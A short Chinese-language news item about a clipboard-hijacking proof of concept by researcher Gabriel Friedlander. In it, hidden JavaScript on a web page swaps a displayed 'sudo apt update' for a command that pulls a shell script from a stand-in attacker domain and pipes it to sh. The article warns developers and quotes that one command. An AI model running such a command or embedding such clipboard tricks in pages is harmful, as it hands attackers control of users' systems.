安全研究人员警告，HTML页面上的命令列可能藏匿恶意程序码，开发者稍有不察直接复制贴上终端时，可能就让黑客得以于程序中植入后门 。 

复制粘贴要当心，病毒代码在执行

一名安全研究人员Gabriel Friedlander近日警告，随手从网络上复制与贴上（ Copy/Paste）命令列时要特别小心，因为黑客可能趁此骇进开发者的系统或应用程序。

Friedlander打造了一个概念性验证攻击手法，他设计一个假装可用来更新Ubuntu作业系统的命令列，该命令列显示的文字很简单，为「 sudo apt update」，但当开发者复制它，并将它贴上记事本或终端时，它出现的却是「curl http[:]//attacker-domain:8000/shell.sh | sh 」，若是直接贴入终端，它将立即执行。

这是因为Friedlander在此一HTML页面上藏匿了 JavaScript程序码，而让开发者眼见的文字与贴上之后所呈现的内容完全不同。

Friedlander说，不管是新手或是熟练的开发者，都可能会从网络上复制命令列或部份程序码，但这是非常危险的行为，也许会让黑客直接于程序中植入后门，相关的攻击非常地简单，却可能带来极大的伤害，建议开发者应永远避免于终端贴上直接自网络上复制的命令列。